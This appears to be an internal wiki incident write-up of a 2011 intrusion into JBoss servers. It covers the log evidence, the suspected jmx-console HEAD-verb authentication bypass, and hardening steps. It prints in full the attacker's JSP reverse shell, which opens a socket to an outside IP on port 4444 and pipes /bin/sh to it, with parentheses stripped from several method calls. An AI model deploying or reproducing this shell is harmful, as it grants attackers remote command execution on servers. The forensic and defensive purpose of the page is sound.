User:Bourke/intrusion analysis

MPDL

Occurrence
happened on: vm25, vm05, vm06 (nims, qa-coreservice, qa-pubman)

detected via
nagios script jboss-deploy-check

analysis

 * from jboss server.log on vm25

WARNING: The User-Agent "OpenNMS HttpMonitor" is unknown; creating an agent with "unknown" agent attributes. 2011-10-18 11:56:34,015 INFO  [org.jboss.varia.deployment.BeanShellSubDeployer]javax.management.InstanceNotFoundException:  jboss.scripts:url=file%3a/tmp/YkkNTSVn.bsh9239.bsh,type=BeanShell is not registered. 2011-10-18 11:56:34,016 ERROR [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost].[/jmx-console]   [HtmlAdaptor]] Servlet.service for servlet HtmlAdaptor threw exception javax.servlet.ServletException: Original SevletResponse or wrapped original ServletResponse not passed to  RequestDispatcher in violation of SRV.8.2 and SRV.14.2.5.1 at org.apache.catalina.core.ApplicationDispatcher.checkSameObjects(ApplicationDispatcher.java:985) at org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:316) at org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:292) at org.jboss.jmx.adaptor.html.HtmlAdaptorServlet.invokeOpByName(HtmlAdaptorServlet.java:290) at org.jboss.jmx.adaptor.html.HtmlAdaptorServlet.processRequest(HtmlAdaptorServlet.java:102) at org.jboss.jmx.adaptor.html.HtmlAdaptorServlet.doGet(HtmlAdaptorServlet.java:77) at javax.servlet.http.HttpServlet.doHead(HttpServlet.java:271) at javax.servlet.http.HttpServlet.service(HttpServlet.java:707) at javax.servlet.http.HttpServlet.service(HttpServlet.java:803) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206) at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:230) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:175) at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:179) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:432) at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:84) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102) at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:157) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:262) at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:844) at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:583) at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:446) at java.lang.Thread.run(Thread.java:619) 2011-10-18 11:56:36,247 INFO [org.jboss.web.tomcat.service.TomcatDeployer] deploy, ctxPath=/zeWvlqOJ,warUrl= .../deploy/zeWvlqOJ.war/

Nothing found Presumably the intruder came in directly to the jboss via port 8080, where we don't log http access (for reasons of data protection).
 * from apache access log.

intrusion payload
drwxr-xr-x 2 jboss users     4096 Oct 18 11:56 zeWvlqOJ.war

vm25:2 13:18:05 /data/jboss-4.2.2.GA/server/default/deploy/zeWvlqOJ.war # ls  wUTRMmIt.jsp

<%@ page import="java.lang.*, java.util.*, java.io.*, java.net.*" %>           <%!                static class StreamConnector extends Thread {                   InputStream is; OutputStream os; StreamConnector( InputStream is, OutputStream os ) {                       this.is = is; this.os = os; }                   public void run {                       BufferedReader in  = null; BufferedWriter out = null; try {                           in  = new BufferedReader( new InputStreamReader( this.is ) ); out = new BufferedWriter( new OutputStreamWriter( this.os ) ); char buffer[] = new char[8192]; int length; while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) {                               out.write( buffer, 0, length ); out.flush; }                       } catch( Exception e ){} try {                           if( in != null ) in.close; if( out != null ) out.close; } catch( Exception e ){} }               }            %>            <%                try {                   Socket socket = new Socket( "2.2.40.143", 4444 ); Process process = Runtime.getRuntime.exec( "/bin/sh" ); ( new StreamConnector( process.getInputStream, socket.getOutputStream ) ).start; ( new StreamConnector( socket.getInputStream, process.getOutputStream ) ).start; } catch( Exception e ) {} %>

ie: any request to this jsp opens a socket to 2.2.40.143 on 4444 to take commands to carry out (as user jboss) on the local system

vulnerability exposed?
We suspect this exploit is the security hole: vulnerability in jmx-console to use of http HEAD verbs

solution
1. turn off autodeploy (except in development environments) jboss community documentation false on bean URLDeploymentScanner in file $JBOSS_HOME/server/default/conf/jboss-service.xml

2. ensure all http verbs trigger authentication by editing in WEB-INF/web.xml of deploy/jmx-console and deploy/management/console-mgr.sar/web-console.war

  HtmlAdaptor An example security config that only allows users with the role JBossAdmin to access the HTML JMX console web application /*   JBossAdmin  

(tested with Firefox Poster Plugin - all verbs tested produced the login screen and a -401 unauthorised with the above configuration. As described in the exploit, without this change, use of the HEAD verb bypassed authorisation and led to an authorised session on the jmx-console)